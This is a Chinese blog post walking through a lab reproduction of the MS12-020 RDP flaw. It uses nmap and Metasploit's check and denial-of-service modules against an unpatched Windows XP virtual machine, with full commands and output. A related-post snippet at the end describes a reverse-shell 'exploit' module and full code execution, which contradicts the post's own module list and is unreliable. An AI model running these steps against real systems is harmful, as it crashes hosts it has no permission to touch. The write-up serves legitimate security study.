ms12-020漏洞复现

于 2024-05-07 19:36:15 发布
阅读量1.4k 收藏 25
点赞数 35
文章标签: 系统安全 windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yyds132310/article/details/138542897
版权

ms12-020漏洞复现

简介

漏洞名:MS12-020(全称:Microsoft windows远程桌面协议RDP远程代码执行漏洞)

介绍:RDP协议是一个多通道的协议,让用户连上提供微软终端机服务的电脑。 windows在处理某些对象时存在错误,可通过特制的RDP报文访问未初始化或已经删除的对象,导致任意代码执行。 然后控制系统。

复现

实验环境

一台windows xp sp3 英文版的主机,作为靶机

一台kali Linux作为攻击机

实验条件:两台机子可以相互ping通,并且靶机(无补丁)开启了3389端口,防火墙是关闭的

漏洞发现

#扫描系统的3389端口是否是开放的

┌──(root㉿kali)-[~]

└─# nmap 192.168.239.135    

Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-04 01:31 EDT

Nmap scan report for 192.168.239.135

Host is up (0.0057s latency).

Not shown: 996 closed tcp ports (reset)

PORT     STATE SERVICE

135/tcp  open  msrpc

139/tcp  open  netbios-ssn

445/tcp  open  microsoft-ds

3389/tcp open  ms-wbt-server

MAC Address: 00:0C:29:7A:03:2D (VMware)

#端口为开放的,接下来尝试攻击

漏洞利用

#启动metasploit

┌──(root㉿kali)-[~]

└─# msfconsole

*Neutrino_Cannon*PrettyBeefy*PostalTime*binbash*deadastronauts*EvilBunnyWrote*L1T*Mail.ru*() { :;}; echo vulnerable*

*Team sorceror*ADACTF*BisonSquad*socialdistancing*LeukeTeamNaam*OWASP Moncton*Alegori*exit*Vampire Bunnies*APT593*

*QuePasaZombiesAndFriends*NetSecBG*coincoin*ShroomZ*Slow Coders*Scavenger Security*Bruh*NoTeamName*Terminal Cult*

*edspiner*BFG*MagentaHats*0x01DA*Kaczuszki*AlphaPwners*FILAHA*Raffaela*HackSurYvette*outout*HackSouth*Corax*yeeb0iz*

*SKUA*Cyber COBRA*flaghunters*0xCD*AI Generated*CSEC*p3nnm3d*IFS*CTF_Circle*InnotecLabs*baadf00d*BitSwitchers*0xnoobs*

*ItPwns - Intergalactic Team of PWNers*PCCsquared*fr334aks*runCMD*0x194*Kapital Krakens*ReadyPlayer1337*Team 443*

*H4CKSN0W*InfOUsec*CTF Community*DCZia*NiceWay*0xBlueSky*ME3*Tipi'Hack*Porg Pwn Platoon*Hackerty*hackstreetboys*

*ideaengine007*eggcellent*H4x*cw167*localhorst*Original Cyan Lonkero*Sad_Pandas*FalseFlag*OurHeartBleedsOrange*SBWASP*

*Cult of the Dead Turkey*doesthismatter*crayontheft*Cyber Mausoleum*scripterz*VetSec*norbot*Delta Squad Zero*Mukesh*

*x00-x00*BlackCat*ARESx*cxp*vaporsec*purplehax*RedTeam@MTU*UsalamaTeam*vitamink*RISC*forkbomb444*hownowbrowncow*

*etherknot*cheesebaguette*downgrade*FR!3ND5*badfirmware*Cut3Dr4g0n*dc615*nora*Polaris One*team*hail hydra*Takoyaki*

*Sudo Society*incognito-flash*TheScientists*Tea Party*Reapers of Pwnage*OldBoys*M0ul3Fr1t1B13r3*bearswithsaws*DC540*

*iMosuke*Infosec_zitro*CrackTheFlag*TheConquerors*Asur*4fun*Rogue-CTF*Cyber*TMHC*The_Pirhacks*btwIuseArch*MadDawgs*

*HInc*The Pighty Mangolins*CCSF_RamSec*x4n0n*x0rc3r3rs*emehacr*Ph4n70m_R34p3r*humziq*Preeminence*UMGC*ByteBrigade*

*TeamFastMark*Towson-Cyberkatz*meow*xrzhev*PA Hackers*Kuolema*Nakateam*L0g!c B0mb*NOVA-InfoSec*teamstyle*Panic*

*B0NG0R3*                                                                                    *Les Cadets Rouges*buf*

*Les Tontons Fl4gueurs*                                                                      *404 : Flag Not Found*

*' UNION SELECT 'password*      _________                __                                  *OCD247*Sparkle Pony*

*burner_herz0g*                 \_   ___ \_____  _______/  |_ __ _________   ____            *Kill$hot*ConEmu*

*here_there_be_trolls*          /    \  \/\__  \ \____ \   __\  |  \_  __ \_/ __ \           *;echo"hacked"*

*r4t5_*6rung4nd4*NYUSEC*        \     \____/ __ \|  |_> >  | |  |  /|  | \/\  ___/           *karamel4e*

*IkastenIO*TWC*balkansec*        \______  (____  /   __/|__| |____/ |__|    \___  >          *cybersecurity.li*

*TofuEelRoll*Trash Pandas*              \/     \/|__|                           \/           *OneManArmy*cyb3r_w1z4rd5*

*Astra*Got Schwartz?*tmux*                  ___________.__                                   *AreYouStuck*Mr.Robot.0*

*\nls*Juicy white peach*                    \__    ___/|  |__   ____                         *EPITA Rennes*

*HackerKnights*                               |    |   |  |  \_/ __ \                        *guildOfGengar*Titans*

*Pentest Rangers*                             |    |   |   Y  \  ___/                        *The Libbyrators*

*placeholder name*bitup*                      |____|   |___|  /\___  >                       *JeffTadashi*Mikeal*

*UCASers*onotch*                                            \/     \/                        *ky_dong_day_song*

*NeNiNuMmOk*                              ___________.__                                     *JustForFun!*

*Maux de tête*LalaNG*                     \_   _____/|  | _____     ____                     *g3tsh3Lls0on*

*crr0tz*z3r0p0rn*clueless*                 |    __)  |  | \__  \   / ___\                    *Phở Đặc Biệt*Paradox*

*HackWara*                                 |     \   |  |__/ __ \_/ /_/  >                   *KaRIPux*inf0sec*

*Kugelschreibertester*                     \___  /   |____(____  /\___  /                    *bluehens*Antoine77*

*icemasters*                                   \/              \//_____/                     *genxy*TRADE_NAMES*

*Spartan's Ravens*                       _______________   _______________                   *BadByte*fontwang_tw*

*g0ldd1gg3rs*pappo*                     \_____  \   _  \  \_____  \   _  \                   *ghoti*

*Les CRACKS*c0dingRabbits*               /  ____/  /_\  \  /  ____/  /_\  \                  *LinuxRiders*   

*2Cr4Sh*RecycleBin*                     /       \  \_/   \/       \  \_/   \                 *Jalan Durian*

*ExploitStudio*                         \_______ \_____  /\_______ \_____  /                 *WPICSC*logaritm*

*Car RamRod*0x41414141*                         \/     \/         \/     \/                  *Orv1ll3*team-fm4dd*

*Björkson*FlyingCircus*                                                                      *PwnHub*H4X0R*Yanee*

*Securifera*hot cocoa*                                                                       *Et3rnal*PelarianCP*

*n00bytes*DNC&G*guildzero*dorko*tv*42*{EHF}*CarpeDien*Flamin-Go*BarryWhite*XUcyber*FernetInjection*DCcurity*

*Mars Explorer*ozen_cfw*Fat Boys*Simpatico*nzdjb*Isec-U.O*The Pomorians*T35H*H@wk33*JetJ*OrangeStar*Team Corgi*

*D0g3*0itch*OffRes*LegionOfRinf*UniWA*wgucoo*Pr0ph3t*L0ner*_n00bz*OSINT Punchers*Tinfoil Hats*Hava*Team Neu*

*Cyb3rDoctor*Techlock Inc*kinakomochi*DubbelDopper*bubbasnmp*w*Gh0st$*tyl3rsec*LUCKY_CLOVERS*ev4d3rx10-team*ir4n6*

*PEQUI_ctf*HKLBGD*L3o*5 bits short of a byte*UCM*ByteForc3*Death_Geass*Stryk3r*WooT*Raise The Black*CTErr0r*

*Individual*mikejam*Flag Predator*klandes*_no_Skids*SQ.*CyberOWL*Ironhearts*Kizzle*gauti*

*San Antonio College Cyber Rangers*sam.ninja*Akerbeltz*cheeseroyale*Ephyra*sard city*OrderingChaos*Pickle_Ricks*

*Hex2Text*defiant*hefter*Flaggermeister*Oxford Brookes University*OD1E*noob_noob*Ferris Wheel*Ficus*ONO*jameless*

*Log1c_b0mb*dr4k0t4*0th3rs*dcua*cccchhhh6819*Manzara's Magpies*pwn4lyfe*Droogy*Shrubhound Gang*ssociety*HackJWU*

*asdfghjkl*n00bi3*i-cube warriors*WhateverThrone*Salvat0re*Chadsec*0x1337deadbeef*StarchThingIDK*Tieto_alaviiva_turva*

*InspiV*RPCA Cyber Club*kurage0verfl0w*lammm*pelicans_for_freedom*switchteam*tim*departedcomputerchairs*cool_runnings*

*chads*SecureShell*EetIetsHekken*CyberSquad*P&K*Trident*RedSeer*SOMA*EVM*BUckys_Angels*OrangeJuice*DemDirtyUserz*

*OpenToAll*Born2Hack*Bigglesworth*NIS*10Monkeys1Keyboard*TNGCrew*Cla55N0tF0und*exploits33kr*root_rulzz*InfosecIITG*

*superusers*H@rdT0R3m3b3r*operators*NULL*stuxCTF*mHackresciallo*Eclipse*Gingabeast*Hamad*Immortals*arasan*MouseTrap*

*damn_sadboi*tadaaa*null2root*HowestCSP*fezfezf*LordVader*Fl@g_Hunt3rs*bluenet*P@Ge2mE*

       =[ metasploit v6.1.27-dev                          ]

+ -- --=[ 2196 exploits - 1162 auxiliary - 400 post       ]

+ -- --=[ 596 payloads - 45 encoders - 10 nops            ]

+ -- --=[ 9 evasion                                       ]

Metasploit tip: Save the current environment with the

save command, future console restarts will use this

environment again

msf6 >

#发现没有每次启动的图像都不一样

#查询有关ms12-020的模块

msf6 > search ms12-020

Matching Modules

================

   #  Name                                              Disclosure Date  Rank    Check  Description

   -  ----                                              ---------------  ----    -----  -----------

   0  auxiliary/scanner/rdp/ms12_020_check                               normal  Yes    MS12-020 Microsoft Remote Desktop Checker

   1  auxiliary/dos/windows/rdp/ms12_020_maxchannelids  2012-03-16       normal  No     MS12-020 Microsoft Remote Desktop Use-After-Free DoS

Interact with a module by name or index. For example info 1, use 1 or use auxiliary/dos/windows/rdp/ms12_020_maxchannelids

发现了两个模块

auxiliary/scanner/rdp/ms12_020_check是扫描模块

auxiliary/dos/windows/rdp/ms12_020_maxchannelids是攻击模块

#使用扫描模块进行扫描

msf6 > use 0

msf6 auxiliary(scanner/rdp/ms12_020_check) > show options

Module options (auxiliary/scanner/rdp/ms12_020_check):

   Name     Current Setting  Required  Description

   ----     ---------------  --------  -----------

   RHOSTS                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit

   RPORT    3389             yes       Remote port running RDP (TCP)

   THREADS  1                yes       The number of concurrent threads (max one per host)

msf6 auxiliary(scanner/rdp/ms12_020_check) > set rhosts 192.168.239.135 #指定靶机地址

rhosts => 192.168.239.135

msf6 auxiliary(scanner/rdp/ms12_020_check) > run

[+] 192.168.239.135:3389  - 192.168.239.135:3389 - The target is vulnerable.

[*] 192.168.239.135:3389  - Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

#发现存在漏洞

#使用攻击模块进行攻击

msf6 auxiliary(scanner/rdp/ms12_020_check) > use 1

msf6 auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > set rhosts 192.168.239.135

rhosts => 192.168.239.135

msf6 auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > run

[*] Running module against 192.168.239.135

[*] 192.168.239.135:3389 - 192.168.239.135:3389 - Sending MS12-020 Microsoft Remote Desktop Use-After-Free DoS

[*] 192.168.239.135:3389 - 192.168.239.135:3389 - 210 bytes sent

[*] 192.168.239.135:3389 - 192.168.239.135:3389 - Checking RDP status...

[+] 192.168.239.135:3389 - 192.168.239.135:3389 seems down

[*] Auxiliary module execution completed

山本的牛爷爷
关注
  • 35
    点赞
  • 25
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
MS12-020漏洞复现(死亡蓝屏)
m0_53673542的博客
04-15 4088
实验环境: 攻击机kali IP:192.168.32.128 靶机windows server 2008 IP:192.168.32.132 1、了解windows server2008虚拟机的基本信息检查是否安装有关该漏洞的补丁 使用systeminfo命令查看: 通过该页面可知:虚拟机win server2008没有安装任何补丁。 2、MS12-020漏洞攻击准备工作: (1)windowsserver 2008需要开启远程桌面: (2)获取靶机windows server .
MS12-020漏洞复现
weixin_45291045的博客
05-15 277
文章目录漏洞描述环境准备端口扫描漏洞复现 漏洞描述 远程桌面协议(RDP, Remote Desktop Protocol)是一个多通道(multi-channel)的协议,让用户(客户端或称“本地电脑”)连上提供微软终端机服务的电脑(服务器端或称“远程电脑”)。 远程桌面协议服务允许远程攻击者通过一系列精心设计的数据包,导致出现拒绝服务漏洞 环境准备 攻击机kali 192.168.182.130 靶机 windows xp 中文版 192.168.182.129 靶机关闭防火墙,靶机需要在攻击机的网段中
漏洞复现MS12-020漏洞(蓝屏攻击)复现
m0_53223419的博客
01-27 1246
使用windows虚拟机、linux虚拟机复现MS12-020漏洞
MS12——020漏洞复现
m0_56267052的博客
04-11 442
MS12_020 开启靶机3389端口 开启远程桌面服务 第三、 Win7: 查看3389端口是否开启 Kali: Ping的通,表示两个电脑可以连通 进入metasploit渗透测试平台 搜索漏洞 auxiliary/scanner/rdp/ms12_020_check ------用来扫描判断靶机是否存在ms12_020漏洞 auxiliary/dos/windows/rdp/ms12_020_ma..
MS12-020 漏洞复现
Clannad的博客
03-13 684
文章目录环境漏洞复现: 环境 攻击者:kaili(192.168.160.179) 受害者:Server 2008 R2 、Win7、 受害者IP:192.168.160.174 漏洞复现: 1、利用msf来检查对方是否有MS12-020漏洞 search ms12-020 2、利用此模块来检查是否有此漏洞 use auxiliary/scanner/rdp/ms12_020_check...
MS12-020漏洞各个版本PoC&EXP打包(含NC,亲测可用)
11-07
MS12-020漏洞各个版本PoC&EXP打包(含NC,亲测可用) [网上流传版]MS12-020 PoC[bug修正版 + 数据包nc发送版] [个人版]ms12-020 Ruby,Python,EXE,DAT,NC一应俱全
ms08-067调研加完全复现
08-25
windows的2008年的经典漏洞ms08-067进行了复现,每一步我都给出了配图,适合新手学习和使用。原创者:x
网安实训(十)| Ms12-020 漏洞复现
朔方鸟的博客
02-19 5492
Ms12-020是针对Windows系统的远程桌面协议的漏洞,通过该漏洞,攻击者可通过对目标系统发送特定内容造成系统蓝屏故障。 实验将利用Metasploit进行MS12-020漏洞复现和攻击。
MS12-020漏洞攻击复现
行动、坚持。
01-24 2530
1、漏洞说明 MS12-020:开启远程桌面服务(3389端口)的系统可被执行远程代码(蓝屏重启) 受影响系统:Windows XP、Windows 7、Server 2003/2008 (漏洞官方说明) 2、实验环境 网络:Win Server 2003 <-> Win XP 角色:Win Server 2003 模拟黑客,Win XP模拟肉鸡/靶机 3、实验流程 DOS下开启远程服务: REG ADD HKLM\SYSTEM\CurrentControlSet\Contr
网络安全 基础之 Windows漏洞复现MS12-020)死亡蓝屏
weixin_60888404的博客
06-02 3083
死亡蓝屏漏洞
ms12-020 死亡蓝屏漏洞复现
lianliandad的博客
11-01 3011
好好学习
ms12-020(蓝屏攻击漏洞复现)
Martin-share的博客
02-11 4636
ms12-020(蓝屏攻击漏洞复现)
攻防实验二:ms12-020(死亡蓝屏)漏洞复现
最新发布
m0_61649980的博客
09-15 626
MS12-020是一个3389远程桌面rdp协议的一个漏洞 攻击者通过特意构造的rdp数据包发送给靶机3389端口,造成系统崩溃。
msf之ms12-020复现
05-24
MS12-020是远程桌面协议(RDP)中的一个漏洞,它可以允许攻击者通过发送恶意的RDP数据包来执行远程代码。MSF(Metasploit框架)是一个开源的漏洞利用工具,可以用来测试和利用此漏洞。 以下是利用MS12-020漏洞的步骤: 1. 首先,需要使用Metasploit框架。如果你还没有安装它,请先到官网下载并安装。 2. 打开Metasploit框架控制台,输入以下命令: ``` use auxiliary/scanner/rdp/ms12_020_check ``` 这个命令将会检查目标是否存在MS12-020漏洞。 3. 如果目标存在漏洞,可以使用以下命令进行攻击: ``` use auxiliary/dos/windows/rdp/ms12_020_maxchannelids set RHOSTS <target IP address> exploit ``` 这个命令将会执行一个拒绝服务攻击,导致目标系统崩溃。这个攻击不会导致目标系统被入侵或数据被窃取,但是可以影响系统的可用性。 4. 如果你想要执行更危险的攻击,可以使用以下命令: ``` use exploit/windows/rdp/ms12_020_maxchannelids set RHOSTS <target IP address> set PAYLOAD windows/meterpreter/reverse_tcp set LHOST <attacker IP address> exploit ``` 这个命令将会执行一个远程代码执行攻击,使用Meterpreter反向Shell连接到目标系统。这个攻击可以让攻击者完全控制目标系统,包括执行任意命令、窃取数据等。 需要注意的是,利用漏洞进行攻击是非法的,只能在授权的环境下进行测试。同时,这个漏洞已经被修复,建议尽快更新你的系统以避免被攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值